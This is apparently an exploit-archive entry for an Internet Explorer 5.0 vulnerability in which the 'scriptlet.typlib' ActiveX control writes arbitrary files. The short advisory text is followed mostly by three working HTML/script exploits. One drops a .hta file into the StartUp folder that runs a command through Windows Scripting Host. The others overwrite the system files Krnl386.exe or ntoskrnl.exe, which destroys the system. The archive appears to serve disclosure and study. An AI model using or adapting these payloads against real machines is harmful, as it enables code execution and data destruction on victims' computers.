Microsoft Internet Explorer 5.0 for Windows 95/Windows 98/Windows NT 4 ActiveX "Object for constructing type libraries for scriptlets" Vulnerability source: The 'scriptlet.typlib' ActiveX control can create, edit, and overwrite files on the local disk. This means that an executable text file (e.g. a '.hta' file) can be written to the startup folder of a remote machine and will be executed the next time that machine reboots. Attackers can exploit this vulnerability via a malicious web page or an email message. Exploit by Georgi Guninski. A working demo is available at: <object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC" > </object> <SCRIPT> scr.Reset(); scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\guninski.hta"; scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert('Written by Georgi Guninski');wsh.Run('c:\\');</"+"SCRIPT>"; scr.write(); </SCRIPT> </object> Exploit by Seth Georgion A working demo is available at: Windows 98: <p> <object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC" width="14" height="14" ></object><script> scr.Reset(); scr.Path="C:\\windows\\system\\Krnl386.exe"; scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert( 'Screw Denise Richards, Debbie Johnson r0x!');wsh.Run('c:\\');</"+"SCRIPT>"; scr.write(); </script> </p> Windows NT: <p> <object id="scr" classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC" width="14" height="14"> </object> <script> scr.Reset(); scr.Path="C:\\WINNT\\System32\\ntoskrnl.exe"; scr.Doc="<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object><SCRIPT>alert( 'Screw Denise Richards, Debbie Johnson r0x!');wsh.Run('c:\\');</"+"SCRIPT>"; scr.write(); </script> </p>